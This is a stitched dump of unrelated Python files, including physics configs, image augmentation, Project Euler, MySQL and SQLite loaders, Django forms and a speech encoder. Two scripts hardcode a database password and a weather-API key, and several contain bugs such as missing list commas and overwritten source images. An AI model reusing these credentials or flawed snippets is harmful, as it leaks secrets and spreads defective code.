( PT > 300 * MeV ) & ( TRCHI2DOF < 3 )\" ,\n #\n # Prescale \n #\n 'pmumu-Prescale' : 1.00 , \n #\n # Technicalities:\n #\n 'Preambulo' : [\n ## shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' ,\n ## shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" ,\n \"ctau = BPVLTIME ( ) * c_light \" \n ]\n #\n }\n }\n\nTau23Mu = {\n 'BUILDERTYPE' : 'Tau23MuLinesConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : ['RD'],\n 'CONFIG' : {\n 'TauPrescale' :1,\n 'TauPostscale' :1,\n 'Ds23PiTISPrescale' :0.02,\n 'Ds23PiTISPostscale' :1,\n 'Ds23PiPrescale' :0.01,\n 'Ds23PiPostscale' :1,\n 'Ds2PhiPiPrescale' :1,\n 'Ds2PhiPiPostscale' :1, \n }\n }\n\n# J. Albrecht\n# Searches for highly displaced dimuons \nVeryDetachedJpsi = {\n 'BUILDERTYPE' : 'VDetJPsiLinesConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : ['RD'],\n 'CONFIG' : {\n 'VDetJPsiLinePrescale' : 1,\n 'VDetJPsiLinePostscale' : 1,\n }\n }\n\n\n\n# N. Serra , M. De Cian \n# Searches for highly displaced dimuons for Inflaton searches\nInflaton2MuMu = {\n 'BUILDERTYPE' : 'StrippingInflaton2MuMuConf' ,\n 'STREAMS' : [ 'Dimuon' ],\n 'WGs' : [ 'RD' ] ,\n 'CONFIG' : {\n 'Inflaton2MuMuLongPrescale' : 1,\n 'Inflaton2MuMuDownstreamPrescale' : 1,\n 'Inflaton2MuMuLongPostscale' : 1,\n 'Inflaton2MuMuDownstreamPostscale' : 1\n }\n }\n","sub_path":"Stripping/Phys/StrippingSettings/python/StrippingSettings/Stripping17/LineConfigDictionaries_RDWG.py","file_name":"LineConfigDictionaries_RDWG.py","file_ext":"py","file_size_in_byte":21471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44390429","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 7 22:57:56 2020\n\n@author: jiayi\n\"\"\"\nimport os\nimport glob\nimport PIL\nimport json\n\ntrain_file = open('train.txt', \"r\")\ntrain = train_file.readlines()\ntrain_paths = list()\nfor p in train:\n p = p.split('\\n')[0]\n train_paths.append(p)\n \nROOT_PATH = \"/home/jiayi/aridDataset/arid_40k_scene_dataset\"\n \nEXP1_ROOT = ROOT_PATH + \"/Exp_1\"\nEXP2_ROOT = ROOT_PATH + \"/Exp_2\"\nEXP4_ROOT = ROOT_PATH + \"/Exp_4\"\nEXP7_ROOT = ROOT_PATH + \"/Exp_7\"\n\ndef create_json(root, img_path):\n obj_id = img_path.split('/')[-2]\n filename = img_path.split('/')[-1].split('.')[0]\n json_path = root.split('rgb')[0] + filename + \".json\" \n image = PIL.Image.open(img_path)\n width, height = image.size\n annotation = {\n \"annotations\": [\n {\n \"class\": \"obj\",\n \"height\": height,\n \"id\": obj_id,\n \"type\": \"rect\",\n \"width\": width,\n \"x\": 0,\n \"y\": 0\n }], \n \"class\": \"image\",\n \"filename\": filename + \".png\"}\n #print(annotation)\n with open(json_path, 'w') as outfile:\n json.dump(annotation, outfile)\n \n \n\ndef get_crops(source_path):\n crops_list = list()\n for root,_,files in os.walk(source_path):\n if root.split('/')[-1] == \"crops\":\n for f in glob.glob(root + \"/*/*.png\"):\n #if source_path is not EXP1_ROOT:\n #create_json(root, f)\n crops_list.append(f)\n return crops_list\n#\n#crops = list()\n#crops += get_crops(EXP1_ROOT)\n#crops += get_crops(EXP2_ROOT)\n#crops += get_crops(EXP7_ROOT)\n#crops += get_crops(EXP4_ROOT)\n#\n#print(len(crops))\n\n\n#file = open('augmented_train.txt', 'w+')\n#for img in glob.glob(\"/home/jiayi/aridDataset/augmented/*.png\"):\n# file.write(img + \"\\n\")\n# \n#file.close()\n\n#file = open('crop_train.txt', 'w+')\n#index_crop = 0\n#while index_crop <= 1000:\n# file.write(crops[index_crop] + \"\\n\")\n# index_crop += 1\n#file.close()\nflipped = []\nfor f in glob.glob('/home/jiayi/aridDataset/flip/*.png'):\n flipped.append(f)\n \n\nimport random\nfrom scipy import ndarray\nimport skimage as sk\nfrom skimage import img_as_ubyte\nfrom skimage import transform\nfrom skimage import util\n#\ndef random_rotation(image_array: ndarray):\n # pick a random degree of rotation between 25% on the left and 25% on the right\n random_degree = random.uniform(-25, 25)\n return sk.transform.rotate(image_array, random_degree)\n\ndef random_noise(image_array: ndarray):\n # add random noise to the image\n return sk.util.random_noise(image_array)\n\ndef horizontal_flip(image_array: ndarray):\n # horizontal flip doesn't need skimage, it's easy as flipping the image array of pixels !\n return image_array[:, ::-1]\n \n# dictionary of the transformations functions we defined earlier\navailable_transformations = {\n #'rotate': random_rotation,\n 'noise': random_noise\n #'horizontal_flip': horizontal_flip\n}\n\nnum_generated_files = 0\n\nwhile num_generated_files <= 1000:\n # random image from the folder\n image_path = random.choice(flipped)\n #obj_id = image_path.split('/')[-2]\n # read image as an two dimensional array of pixels\n image_to_transform = sk.io.imread(image_path)\n # random num of transformations to apply\n num_transformations_to_apply = random.randint(1, len(available_transformations))\n \n num_transformations = 0\n transformed_image = None\n while num_transformations <= num_transformations_to_apply:\n # choose a random transformation to apply for a single image\n key = random.choice(list(available_transformations))\n transformed_image = available_transformations[key](image_to_transform)\n num_transformations += 1\n \n # define a name for our new file\n new_file_path = image_path\n sk.io.imsave(new_file_path,img_as_ubyte(transformed_image))\n\n# write image to the disk\n #sk.io.imsave(new_file_path, transformed_image)\n# image = PIL.Image.open(new_file_path)\n# width, height = image.size\n# print(width, height)\n# annotation = {\n# \"annotations\": [\n# {\n# \"class\": \"obj\",\n# \"height\": height,\n# \"id\": obj_id,\n# \"type\": \"rect\",\n# \"width\": width,\n# \"x\": 0,\n# \"y\": 0\n# }], \n# \"class\": \"image\",\n# \"filename\": image_path.split('/')[-1]}\n# \n# json_path = image_path.split('.')[0] + '.json'\n# with open(json_path, 'w') as outfile:\n# json.dump(annotation, outfile)\n\n num_generated_files += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"add_crops.py","file_name":"add_crops.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84345190","text":"\"\"\"\nMichael S. Emanuel\nMon May 14 16:24:27 2018\n\nComposites with prime repunit property\nProblem 130\n\nA number consisting entirely of ones is called a repunit.\nWe shall define R(k) to be a repunit of length k; for example, R(6) = 111111.\n\nGiven that n is a positive integer and GCD(n, 10) = 1, it can be shown that there always exists a\nvalue, k, for which R(k) is divisible by n, and let A(n) be the least such value of k;\nfor example, A(7) = 6 and A(41) = 5.\n\nYou are given that for all primes, p > 5, that p − 1 is divisible by A(p).\nFor example, when p = 41, A(41) = 5, and 40 is divisible by 5.\n\nHowever, there are rare composite values for which this is also true;\nthe first five examples being 91, 259, 451, 481, and 703.\n\nFind the sum of the first twenty-five composite values of n for which\nGCD(n, 10) = 1 and n − 1 is divisible by A(n).\n\"\"\"\n\nfrom Euler.Primes import PrimeTable, generateCoprimes\nfrom Euler.Repunit import minDivisor\nfrom typing import List, Tuple, Iterator\n\n\ndef hasSpecialProp(pt: PrimeTable, n: int, b: int = 10) -> bool:\n \"\"\"Does n have the special property that n-1 divides A(n)?\"\"\"\n # Find the min divisor An\n An: int = minDivisor(n, pt, b)\n return (n-1) % An == 0\n\n\ndef findSpecialComposites(pt: PrimeTable, goal: int, b: int = 10) -> List[int]:\n \"\"\"Find special composite numbers.\"\"\"\n # Special numbers found\n specialNums: List[int] = []\n specialCount: int = len(specialNums)\n # Generator for integers coprime to b\n candidates: Iterator[int] = generateCoprimes(b)\n # Advance iterator past the largest prime factor of b\n nMin: int = max(pt.factorize(b))\n n: int = next(candidates)\n while n < nMin:\n n = next(candidates)\n # Check the first candidate\n if not pt.isPrime(n) and hasSpecialProp(pt, n, b):\n specialNums.append(n)\n specialCount = len(specialNums)\n # Iterations of work\n iters: int = 0\n # Status update\n displayInt: int = 1000\n for n in candidates:\n # Skip prime numbers- searching for composites only\n if pt.isPrime(n):\n continue\n # Does n have the special property?\n if hasSpecialProp(pt, n):\n specialNums.append(n)\n specialCount = len(specialNums)\n # Status update\n iters += 1\n if iters % displayInt == 0:\n print(f'Processed {iters} iters up to n={n}. Found {specialCount} so far.')\n # Have we achieved the goal?\n if specialCount >= goal:\n break\n # When we reach here, the goal has been satisfied for the first time\n return specialNums\n\n\ndef main() -> int:\n # Goal - number of special composites we seek\n goal: int = 25\n # Instantiate prime table\n pt: PrimeTable = PrimeTable(10**5)\n # Search for special composites\n specialComposites = findSpecialComposites(pt, goal)\n # The answer is the sum of the special composites\n ans: int = sum(specialComposites[:goal])\n # Print the answer\n print(f'\\nFound {goal} special composites with sum {ans}.')\n print(f'Special composites found:')\n print(specialComposites)\n return ans\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Prob130_CompositesWithRepunitProperty.py","file_name":"Prob130_CompositesWithRepunitProperty.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"114361871","text":"import pandas as pd\nimport numpy as np\nimport pymysql\n\nfrom shared import *\nfrom decimal import Decimal\nfrom datetime import datetime\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n passwd='km47196',\n db='movieaugur',\n charset='utf8')\n\nrating_dir = DATA_DIR + 'ratings/'\n\nadd_movies_sql = \"\"\"INSERT INTO Movie(title, description, budget, release_date, distributer, mpaa, genre, gross, tickets_sold, rotten_tomatoes_avg, poster_url, poster_name) \nVALUES(%s, %s, NULL, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n\norg_df = get_merge_movie_df()\ndf = pd.read_csv(rating_dir + 'ratings.csv', encoding='utf-8', index_col=0)\n\ndo_not_include = list(org_df.columns.values) + ['description', 'poster_name', 'poster_url', 'critic_average']\nreviewer_columns = [i for i in df.columns if i not in do_not_include]\n\nfor index, row in df.iterrows():\n continue\n with connection.cursor() as cursor:\n cursor.execute(add_movies_sql, (row['Title'], row['description'], datetime.strptime(row['Release Date'], '%m/%d/%Y'), row['Distributer'], row['MPAA'], row['Genre'], long(row['Gross']), long(row['Tickets Sold']), float(row['critic_average']), row['poster_url'], row['poster_name']))\n \n connection.commit()\n \nadd_user_sql = \"\"\"INSERT INTO User(professional_reviewer, full_name)\nVALUES(1, %s)\"\"\"\n\nfor reviewer in reviewer_columns:\n continue\n with connection.cursor() as cursor:\n cursor.execute(add_user_sql, (reviewer,))\n connection.commit()\n \ncount = 0\nadd_movie_user_mapping_sql = \"\"\"INSERT INTO UserMovieMapping(movie, user, rating, rating_date, rating_source)\nVALUES((SELECT id FROM Movie WHERE Title=%s and gross=%s), (SELECT id FROM User WHERE full_name=%s), %s, (SELECT release_date FROM Movie WHERE Title=%s and gross=%s), \"rt\")\"\"\"\nfor index, row in df.iterrows():\n for reviewer in reviewer_columns:\n if np.isnan(row[reviewer]):\n continue\n count += 1\n if count < 29549:\n continue \n with connection.cursor() as cursor:\n cursor.execute(add_movie_user_mapping_sql, (row['Title'], long(row['Gross']), reviewer, row[reviewer], row['Title'], long(row['Gross'])))\n \n connection.commit()\n\nconnection.close() ","sub_path":"python/ratings_to_db.py","file_name":"ratings_to_db.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153574109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 7 15:32:05 2021\n\n@author: mauratoner\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport requests\nimport sqlite3\nimport sys\n\n## NOTE: SEE README for execution and output via command line \n\n\n## FETCH DATA\ncost = pd.read_csv(\"https://raw.githubusercontent.com/mctoner/ds3002_project1/main/movehubcostofliving.csv\") #reading in link, actual csv file from kaggle and linked in github\ncost.head() #table with various costs of living for cities\nquality = pd.read_csv(\"https://raw.githubusercontent.com/mctoner/ds3002_project1/main/movehubqualityoflife.csv\")\nquality.head() #table of quality of life metrics by city\n\n## MODIFY NUMBER OF COLUMNS\n# combine cost and quality tables by common attribute 'city'\ndf=quality.merge(cost, how='inner', on='City') #concat two data sources together\n# (below) use OpenWeather API to create a column for current weather in each city\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\" #API url\napi_key = \"bc4c03efd67ea7c13afad5ec517ac952\" #my personal API key\ntemps=[] #empty list for storing city temperatures\ndescriptions=[]\n## I will now call the Open Weather Map API to add the current temp and description of weather for each city in the dataaset.\n## Note that the API can only call one city at a time with a free subscription, so I looped through the data to make multiple API calls.\nfor i in range(len(df)): #loop through each city\n city_name = df[\"City\"][i] #call for one city name\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name #complete url for api call includes key and city code\n response = requests.get(complete_url)# return response object\n response.raise_for_status() #raise for status if not 2xx type response \n x = response.json() #convert data from API call into a JSON\n if x[\"cod\"] != \"404\": #if not empty or error\n current_temperature = x[\"main\"][\"temp\"] #store current temperature\n description = x[\"weather\"][0][\"description\"] #store description of weather\n temps.append(current_temperature) #append current temperature to running list of city temps\n descriptions.append(description) #append city weather description to running list \n else:\n sys.exit(\"City Not Found\") #if city not in API data, raise error\ndf['current_temp_kelvin']=temps #add temperatures as a column to data frame\ndf['descriptions']=descriptions #add to column in data frame\n\n# my path_to_db = \"/Users/mauratoner/sqlite/ds3002proj.db\" -- want to make this a command line variable \ntry:\n path_to_db=sys.argv[1] #command line variable will be the path to a sqlite database\n conn = sqlite3.connect(path_to_db)# create database connection and create database if it doesn't already exist\nexcept: #raises error if filepath doesn't exist\n sys.exit('File path incorrect or empty! Supply a CL file path into a database in your SQLite directory') \ncur = conn.cursor() #create cursor\n\nrecords = df.to_records(index=False) #convert dataframe to list of tuples, necessary to be compatible with SQLite format\nresult = list(records) #list of tuples to be used by cursor\n\n# create a table in the db called \"cities\" and pass a schema\ncur.execute('drop table if exists cities') #drop table if it exists so we can create new data\nconn.commit() #end transaction with commit \n\n#create table with same column names as df\ncur.execute('create table cities (city text,rating real,purchase_power real,healthcare real,pollution real,qualityoflife real,crimerating real,cappucino real,cinema real,wine real,gasoline real,avgrent real,disposable_income real,temp real,description text)')\nconn.commit() #commit the changes\n# insert multiple records of data with executemany()\ncur.executemany('insert into cities values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', result) #insert data from df\nconn.commit() #commit the changes\n\n#lastly, check that table was created and data was entered by querying the SQLdatabase\ncur.execute(\"select * from cities\") #select all rows and cols from table cities\ndata=cur.fetchall() #store data in 'data'\n# print(data)\nif len(data)==0: #if data is empty, table was not created in sqlite successfully\n sys.exit('Error: Table was not successfully made in SQLite!') #raise error for incomplete creation of table\nelse: #print number of rows and columns of output data\n print(\"Task completed! A csv of cities has been edited and written to SQL database.\", '\\nrows=',len(df),'\\ncolumns=',len(df.columns))\n \n#close cursor and database connection\ncur.close()\nconn.close()\n\n\"\"\"\nSources:\n https://github.com/UVADS/ds2001/blob/main/lecture_notes/python/interacting_w_relational_database.py\n https://www.kaggle.com/blitzr/movehub-city-rankings?select=movehubqualityoflife.csv\n https://www.geeksforgeeks.org/python-find-current-weather-of-any-city-using-openweathermap-api/\n https://stackoverflow.com/questions/14994948/iterate-each-row-om-table-and-make-api-call\n https://www.programiz.com/python-programming/user-defined-exception\n https://stackoverflow.com/questions/20844347/how-would-i-make-a-custom-error-message-in-python\n https://datatofish.com/create-database-python-using-sqlite3/\n https://towardsdatascience.com/python-pandas-and-sqlite-a0e2c052456f\n https://stackoverflow.com/questions/2440147/how-to-check-the-existence-of-a-row-in-sqlite-with-python\n \"\"\"\n \n","sub_path":"proj_updated_errors.py","file_name":"proj_updated_errors.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230092495","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# rce-core/rce/core/container.py\n#\n# This file is part of the RoboEarth Cloud Engine framework.\n#\n# This file was originally created for RoboEearth\n# http://www.roboearth.org/\n#\n# The research leading to these results has received funding from\n# the European Union Seventh Framework Programme FP7/2007-2013 under\n# grant agreement no248942 RoboEarth.\n#\n# Copyright 2013 RoboEarth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# \\author/s: Dominique Hunziker\n#\n#\n\n# twisted specific imports\nfrom twisted.internet.address import IPv4Address\nfrom twisted.internet.defer import Deferred, succeed\n\n# rce specific imports\nfrom rce.core.base import Proxy\n\n\nclass Container(Proxy):\n \"\"\" Representation of an LXC container.\n \"\"\"\n def __init__(self, machine, userID):\n \"\"\" Initialize the Container.\n\n @param machine: Machine in which the container was created.\n @type machine: rce.core.machine.Machine\n\n @param userID: ID of the user who created the container.\n @type userID: str\n \"\"\"\n super(Container, self).__init__()\n self._userID = userID\n self._machine = machine\n machine.registerContainer(self)\n\n self._pending = set()\n self._address = None\n\n def getAddress(self):\n \"\"\" Get the address which should be used to connect to the environment\n process for the cloud engine internal communication. The method\n gets the address only once and caches the address for subsequent\n calls.\n\n @return: twisted::IPv4Address which can be used to\n connect to the ServerFactory of the cloud\n engine internal communication protocol.\n (type: twisted.internet.address.IPv4Address)\n @rtype: twisted.internet.defer.Deferred\n \"\"\"\n if self._address is None:\n if not self._pending:\n # This is the first time this method is called dispatch a call\n # to fetch the address\n def cb(result):\n self._address = result\n\n for p in self._pending:\n p.callback(result)\n\n self._pending = set()\n\n addr = self.callRemote('getPort')\n addr.addCallback(lambda port: IPv4Address('TCP',\n self._machine.IP,\n port))\n addr.addBoth(cb)\n\n d = Deferred()\n self._pending.add(d)\n return d\n\n return succeed(self._address)\n\n def destroy(self):\n \"\"\" Method should be called to destroy the container and will take care\n of deleting all circular references.\n \"\"\"\n if self._machine:\n self._machine.unregisterContainer(self)\n self._machine = None\n\n super(Container, self).destroy()\n else:\n print('container.Container destroy() called multiple times...')\n","sub_path":"rce-core/rce/core/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455468962","text":"\nEND = \"end\"\nTEAMS_DATA = [\n \"FC_Barcelona_10_11.csv\",\n \"FC_Barcelona_19_20.csv\"\n]\n\nSCORERS_LIST_FOR_SHINDAN = [\n \"メッシ\",\n \"メッシ\",\n \"メッシ\",\n \"メッシ\",\n \"スアレス\"\n \"スアレス\"\n \"ベンゼマ\",\n \"ベンゼマ\",\n \"ベンゼマ\",\n \"ロナウド\",\n \"ロナウド\",\n \"ネイマール\",\n \"ネイマール\",\n \"イニエスタ\",\n \"ペドロ\",\n \"カカ\",\n \"ディ・マリア\",\n \"ベイル\",\n \"サンチェス\",\n \"アザール\",\n \"ムバッペ\"\n]\n","sub_path":"settings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424313450","text":"from django import forms\nfrom django.forms import ModelForm\nfrom django.forms import widgets\nfrom django.forms.fields import MultipleChoiceField\nfrom django.forms.widgets import SelectMultiple\nfrom . import models\n\nclass ContactForm(ModelForm):\n class Meta:\n model = models.Contact\n fields = '__all__'\n exclude = [\n 'date',\n 'status'\n ]\n widgets = {\n 'first_name': widgets.TextInput(attrs={\n 'id': 'first_name',\n 'class': 'form-control'\n }\n ),\n 'last_name': widgets.TextInput(attrs={\n 'id': 'last_name',\n 'class': 'form-control'\n }\n ),\n 'email': widgets.EmailInput(attrs={\n 'id': 'email',\n 'class': 'form-control'\n }\n ),\n 'message': widgets.Textarea(attrs={\n 'id': 'message',\n 'class': 'form-control'\n }\n ),\n }\n\nclass ReserveForm(ModelForm):\n class Meta:\n model = models.Reservation\n fields = '__all__'\n exclude = [\n 'date',\n 'status'\n ]\n widgets = {\n 'first_name': widgets.TextInput(attrs={\n 'id': 'first_name',\n 'class': 'form-control'\n }\n ),\n 'last_name': widgets.TextInput(attrs={\n 'id': 'last_name',\n 'class': 'form-control'\n }\n ),\n 'email': widgets.EmailInput(attrs={\n 'id': 'email',\n 'class': 'form-control'\n }\n ),\n 'date_start': widgets.SelectDateWidget(attrs={\n 'id': 'date_start',\n # 'class': 'form-control'\n }\n ),\n 'date_end': widgets.SelectDateWidget(attrs={\n 'id': 'date_end',\n # 'class': 'form-control'\n }\n ),\n 'car': widgets.Select(attrs={\n 'id': 'car',\n 'class': 'form-select'\n }\n ),\n 'option': widgets.Select(attrs={\n 'id': 'option',\n 'class': 'form-select'\n }\n ),\n 'message': widgets.Textarea(attrs={\n 'id': 'message',\n 'class': 'form-control',\n 'rows': '6'\n }\n ),\n }\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"144757864","text":"'''\nThis problem was asked by Airbnb.\n\nYou come across a dictionary of sorted words in a language\n you've never seen before.\nWrite a program that returns the correct order of letters in this language.\n\nFor example, given ['xww', 'wxyz', 'wxyw', 'ywx', 'ywz'],\n you should return ['x', 'z', 'w', 'y'].\n'''\n\nimport collections\n\n\ndef find_ordered_letters(words):\n '''\n Time Complexity: O(nmk)\n - n is the size of the words array\n - m is the average word size\n - k is the size of the letters stack\n Space Complexity: O(n)\n '''\n letters = collections.deque()\n temporary_letters = collections.deque()\n visited = set()\n for i in range(len(words) - 1):\n first_word = words[i]\n second_word = words[i+1]\n size = len(first_word) if len(first_word) < len(second_word) else len(second_word)\n for j in range(size):\n first_char = first_word[j]\n second_char = second_word[j]\n if first_char != second_char:\n if first_char not in visited and second_char not in visited:\n letters.appendleft(second_char)\n letters.appendleft(first_char)\n visited.add(first_char)\n visited.add(second_char)\n elif first_char in visited and second_char not in visited:\n while letters[0] != first_char:\n temporary_letters.appendleft(letters.popleft())\n temporary_letters.appendleft(letters.popleft())\n letters.appendleft(second_char)\n while temporary_letters:\n letters.appendleft(temporary_letters.popleft())\n visited.add(second_char)\n elif first_char not in visited and second_char in visited:\n while letters[0] != second_char:\n temporary_letters.appendleft(letters.popleft())\n letters.appendleft(first_char)\n while temporary_letters:\n letters.appendleft(temporary_letters.popleft())\n visited.add(first_char)\n break\n return list(letters)\n\n\nif __name__ == '__main__':\n word_lists = [\n ['xww', 'wxyz', 'wxyw', 'ywx', 'ywz'],\n ['abc', 'abd', 'bad', 'cab', 'dab']\n ]\n for words in word_lists:\n print(find_ordered_letters(words))\n","sub_path":"python/unknown_alphabet.py","file_name":"unknown_alphabet.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3638517","text":"import torch\n\nfrom espnet.nets.pytorch_backend.fsmn.feature_transform import FeatureTransform\nfrom espnet.nets.pytorch_backend.fsmn.subsampling import Conv2dSubsampling\nfrom espnet.nets.pytorch_backend.fsmn.subsampling import SpliceSubsampling\nfrom espnet.nets.pytorch_backend.fsmn.encoder_layer import FSMN, DFSMN\nfrom espnet.nets.pytorch_backend.fsmn.repeat import repeat\n\n\nclass Encoder(torch.nn.Module):\n \"\"\"FSMN encoder module\n\n :param int idim: input dim\n :param int cdim: inner dimention\n :param int hdim: hidden dimention\n :param str feature_transform_splice: splices str for feature transform\n :param str feature_transform_cmvn: cmvn files for feature transform\n :param str subsample_layer: subsample layer\n :param int num_layers: the number of encoder dfsmn layers\n :param list order: memory order for fsmn and dfsmn\n :param list stride: memory stride for fsmn and dfsmn\n \"\"\"\n\n def __init__(self, idim, cdim=512, hdim=2048,\n feature_transform_splice=None,\n feature_transform_cmvn=None,\n subsample_layer=\"conv2d\",\n skip_frame=1,\n num_layers=9,\n order=[10,1],\n stride=[1]\n ):\n super(Encoder, self).__init__()\n\n self.skip_frame = skip_frame\n self.feature_transform = FeatureTransform(feature_transform_splice, feature_transform_cmvn)\n if subsample_layer == \"conv2d\":\n self.subsample = Conv2dSubsampling(idim, cdim, skip_frame)\n else:\n raise ValueError(\"unknown subsample_layer: \" + subsample_layer)\n\n self.fsmn = FSMN(cdim, cdim, order, stride)\n self.dfsmn1 = torch.nn.ModuleList(\n [DFSMN(cdim, hdim, cdim, order, stride) for _ in range(num_layers-2)]\n )\n self.splicesample = SpliceSubsampling(cdim, cdim, skip_frame=2)\n self.dfsmn2 = torch.nn.ModuleList(\n [DFSMN(cdim, hdim, cdim, order, stride) for _ in range(2)]\n )\n self.out = torch.nn.Sequential(\n torch.nn.Linear(cdim, hdim),\n torch.nn.ReLU(),\n torch.nn.Linear(hdim, hdim),\n torch.nn.ReLU(),\n torch.nn.Linear(hdim, cdim, bias=False)\n )\n\n def forward(self, xs, masks=None):\n \"\"\"Embed positions in tensor\n\n :param torch.Tensor xs: input tensor\n :param torch.Tensor masks: input mask\n :return: encoder tensor and mask\n :rtype Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n # print('after load: ', xs.shape, xs)\n if xs.size(1) % (self.skip_frame * 2) > 0:\n xs = torch.cat((xs, xs[:,-1:].repeat(1, (self.skip_frame * 2 - (xs.size(1) % (self.skip_frame * 2))), 1)), 1)\n if masks is not None:\n masks = torch.cat((masks, masks[:,-1:].repeat(1, (self.skip_frame * 2 - (masks.size(1) % (self.skip_frame * 2))))), 1)\n xs = self.feature_transform(xs)\n if isinstance(self.subsample, Conv2dSubsampling):\n xs, masks = self.subsample(xs, masks)\n else:\n xs = self.subsample(xs)\n xs = self.fsmn(xs)\n for dfsmn in self.dfsmn1:\n xs = dfsmn(xs)\n self.memory, self.memory_mask = xs, masks\n xs, masks = self.splicesample(xs, masks)\n for dfsmn in self.dfsmn2:\n xs = dfsmn(xs)\n xs = self.out(xs)\n return xs, masks\n","sub_path":"espnet/nets/pytorch_backend/fsmn/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222996641","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Graphite-compatible functions\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2014 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n## Python modules\nfrom collections import defaultdict\nimport math\nimport datetime\nimport random\nimport re\n## Third-party modules\nfrom graphite.attime import parseTimeOffset\n## NOC modules\nfrom data import TimeSeries, epoch\nfrom noc.lib.dateutils import total_seconds\nfrom graphite.glyph import format_units\n\nNAN = float('NaN')\nINF = float('inf')\n## Function registry\nfunctions = {}\n\n\ndef api(*names):\n \"\"\"\n Decocator for functions definitions\n \"\"\"\n def decorated(f):\n for name in names:\n functions[name] = f\n return f\n return decorated\n\n\n##\n## Utility functions\n##\ndef format_path(series_list):\n \"\"\"\n Returns a comma-separated list of unique path expressions.\n \"\"\"\n pe = sorted(set([s.pathExpression for s in series_list]))\n return \",\".join(pe)\n\n\ndef normalize(name, series_lists):\n sl = reduce(lambda x, y: x + y, series_lists)\n pe = \"%s(%s)\" % (name, format_path(sl))\n return pe, sl\n\n\ndef is_empty(series_lists):\n return not series_lists or series_lists == ([],)\n\n\ndef get_percentile(points, n, interpolate=False):\n \"\"\"\n Percentile is calculated using the method outlined in the NIST Engineering\n Statistics Handbook:\n http://www.itl.nist.gov/div898/handbook/prc/section2/prc252.htm\n \"\"\"\n sorted_points = sorted(p for p in points if p[0] is not None)\n if len(sorted_points) == 0:\n return None\n fractional_rank = (n/100.0) * (len(sorted_points) + 1)\n rank = int(fractional_rank)\n rank_fraction = fractional_rank - rank\n\n if not interpolate:\n rank += int(math.ceil(rank_fraction))\n\n if rank == 0:\n percentile = sorted_points[0]\n elif rank - 1 == len(sorted_points):\n percentile = sorted_points[-1]\n else:\n percentile = sorted_points[rank - 1] # Adjust for 0-index\n\n if interpolate:\n if rank != len(sorted_points): # if a next value exists\n next_value = sorted_points[rank]\n percentile = percentile + rank_fraction * (next_value - percentile)\n\n return percentile\n\n\n##\n## API Functions (in alphabet order)\n##\n@api(\"absolute\")\ndef absolute(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list and applies the mathematical abs\n function to each datapoint transforming it to its absolute value.\n\n Example::\n\n &target=absolute(Server.instance01.threads.busy)\n &target=absolute(Server.instance*.threads.busy)\n \"\"\"\n for series in series_list:\n series.set_name(\"absolute(%s)\" % series.name)\n series.apply(abs)\n return series_list\n\n\n@api(\"alias\")\ndef alias(ctx, series_list, new_name):\n \"\"\"\n Takes one metric or a wildcard series_list and a string in quotes.\n Prints the string instead of the metric name in the legend.\n\n Example::\n\n &target=alias(Sales.widgets.largeBlue,\"Large Blue Widgets\")\n\n \"\"\"\n try:\n series_list.set_name(new_name)\n except AttributeError:\n for series in series_list:\n series.set_name(new_name)\n return series_list\n\n\n@api(\"aliasByNode\")\ndef aliasByNode(ctx, series_list, *nodes):\n \"\"\"\n Takes a series_list and applies an alias derived from one or more \"node\"\n portion/s of the target name. Node indices are 0 indexed.\n\n Example::\n\n &target=aliasByNode(ganglia.*.cpu.load5,1)\n\n 